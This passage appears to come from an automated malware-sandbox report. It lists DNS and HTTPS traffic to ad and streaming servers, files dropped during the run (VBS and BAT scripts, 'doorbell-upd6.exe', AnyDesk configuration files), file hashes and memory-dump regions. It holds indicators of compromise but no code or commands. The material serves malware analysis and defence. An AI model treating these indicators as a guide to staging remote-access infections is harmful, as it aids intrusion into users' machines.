| DE | 136.243.134.97:443 | pxl.tsyndicate.com | tcp |
| US | 8.8.8.8:53 | 71.44.133.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.46.243.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.128.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.134.243.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | fa.openrtb-banner.com | udp |
| US | 172.67.189.45:443 | fa.openrtb-banner.com | tcp |
| US | 8.8.8.8:53 | 45.189.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vstream-48.sb-cd.com | udp |
| NL | 185.76.10.18:443 | vstream-48.sb-cd.com | tcp |
| US | 8.8.8.8:53 | ad.a-ads.com | udp |
| DE | 136.243.11.250:443 | ad.a-ads.com | tcp |
| US | 8.8.8.8:53 | 18.10.76.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.11.243.136.in-addr.arpa | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | a.orbsrv.com | udp |
| DE | 136.243.46.131:443 | tsyndicate.com | tcp |
| FR | 185.93.2.11:443 | a.orbsrv.com | tcp |
| US | 8.8.8.8:53 | s.orbsrv.com | udp |
| NL | 95.211.229.248:443 | s.orbsrv.com | tcp |
| DE | 136.243.134.97:443 | pxl.tsyndicate.com | tcp |
| US | 8.8.8.8:53 | 248.229.211.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.2.93.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | vstream-13.sb-cd.com | udp |
| DE | 212.102.56.136:443 | vstream-13.sb-cd.com | tcp |
| US | 8.8.8.8:53 | 136.56.102.212.in-addr.arpa | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| NL | 95.211.229.248:443 | s.orbsrv.com | tcp |
| DE | 136.243.46.131:443 | tsyndicate.com | tcp |
| DE | 136.243.134.97:443 | pxl.tsyndicate.com | tcp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | 23.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| NL | 95.211.229.248:443 | s.orbsrv.com | tcp |
| NL | 95.211.229.248:443 | s.orbsrv.com | tcp |
| DE | 136.243.46.131:443 | tsyndicate.com | tcp |
| US | 8.8.8.8:53 | vstream-47.sb-cd.com | udp |
| NL | 143.244.42.56:443 | vstream-47.sb-cd.com | tcp |
| DE | 136.243.134.97:443 | pxl.tsyndicate.com | tcp |
| US | 8.8.8.8:53 | 56.42.244.143.in-addr.arpa | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | ad.a-ads.com | udp |
| DE | 136.243.4.18:443 | ad.a-ads.com | tcp |
| US | 8.8.8.8:53 | static.a-ads.com | udp |
| DE | 148.251.1.246:443 | static.a-ads.com | tcp |
| US | 8.8.8.8:53 | 18.4.243.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.1.251.148.in-addr.arpa | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| DE | 136.243.46.131:443 | tsyndicate.com | tcp |
| DE | 136.243.134.97:443 | pxl.tsyndicate.com | tcp |
| US | 8.8.8.8:53 | vstream-10.sb-cd.com | udp |
| DE | 138.199.37.55:443 | vstream-10.sb-cd.com | tcp |
| DE | 138.199.37.55:443 | vstream-10.sb-cd.com | tcp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| DE | 136.243.46.131:443 | tsyndicate.com | tcp |
| US | 8.8.8.8:53 | pxl.tsyndicate.com | udp |
| DE | 213.239.193.198:443 | pxl.tsyndicate.com | tcp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | 198.193.239.213.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
\??\pipe\LOCAL\crashpad_4088_XQTNHGFMFIYEJDIO
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\02528e4a-6ba0-4fd2-aa75-15f06440783f.tmp
C:\Users\Admin\Downloads\Unconfirmed 199374.crdownload
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Temp\4987.tmp\4988.tmp\4989.vbs
C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe
C:\Users\Admin\AppData\Local\Temp\4C08.tmp\4C09.tmp\4C0A.bat
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5gwsisp4.moo.ps1
C:\Users\Admin\Downloads\AnyDesk.exe
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf
C:\ProgramData\AnyDesk\system.conf
C:\ProgramData\AnyDesk\service.conf
C:\Users\Admin\AppData\Roaming\enc1.mp3
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\Origins\CURRENT
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe589b60.TMP
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
memory/5184-883-0x00007FF9CC3C0000-0x00007FF9CC3F4000-memory.dmp
memory/5184-882-0x00007FF7A95B0000-0x00007FF7A96A8000-memory.dmp
memory/5184-891-0x00007FF9B90C0000-0x00007FF9B90D1000-memory.dmp
memory/5184-899-0x00007FF9B81A0000-0x00007FF9B81BB000-memory.dmp
memory/5184-898-0x00007FF9B81C0000-0x00007FF9B81D1000-memory.dmp
memory/5184-896-0x00007FF9B8F80000-0x00007FF9B8F91000-memory.dmp
memory/5184-895-0x00007FF9B8FA0000-0x00007FF9B8FB8000-memory.dmp
memory/5184-894-0x00007FF9B8FC0000-0x00007FF9B8FE1000-memory.dmp
memory/5184-900-0x00000213F6590000-0x00000213F7640000-memory.dmp
memory/5184-893-0x00007FF9B9070000-0x00007FF9B90B1000-memory.dmp
memory/5184-892-0x00007FF9B81E0000-0x00007FF9B83EB000-memory.dmp
memory/5184-884-0x00007FF9B83F0000-0x00007FF9B86A6000-memory.dmp
memory/5184-897-0x00007FF9B8F60000-0x00007FF9B8F71000-memory.dmp
memory/5184-890-0x00007FF9B90E0000-0x00007FF9B90FD000-memory.dmp
memory/5184-889-0x00007FF9B9FE0000-0x00007FF9B9FF1000-memory.dmp
memory/5184-888-0x00007FF9BA000000-0x00007FF9BA017000-memory.dmp
memory/5184-887-0x00007FF9CBB20000-0x00007FF9CBB31000-memory.dmp
memory/5184-886-0x00007FF9CC320000-0x00007FF9CC337000-memory.dmp
memory/5184-885-0x00007FF9CC990000-0x00007FF9CC9A8000-memory.dmp
memory/6076-952-0x0000000000170000-0x00000000018B9000-memory.dmp
memory/4984-953-0x0000000000170000-0x00000000018B9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 4718e6c15689ba81f13a94edf6c2ebf2 |
| SHA1 | 88908a065e150059bf6b4b8b6a49fe7d83552e3a |
| SHA256 | 6fb4316b0a01262cb5c4554c586d170ce586174df1b78a8087b43c859e3c19e9 |
| SHA512 | e9d2719b9fc01f1722e30ec9a4da8d09fc296b1dd380db5655c32b181c569868dd7e6d7dd3abe0821da1eefec73d7126a12521af24e18a6c27c50f89e0a2ae2a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000030
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\b2e88c76a3eefbcd_0
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\0f46476bd152aea8_0
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\c73e46604bce30a5_0
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f74d111942d7cc04_0
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fa05a34a1f35a5fb_0
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\1e6b65dda9d8926d_0
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\c3ed1c4a75d5224b_0
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\7f5a539dc96094d8_0
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f4466e9b79bd5664_0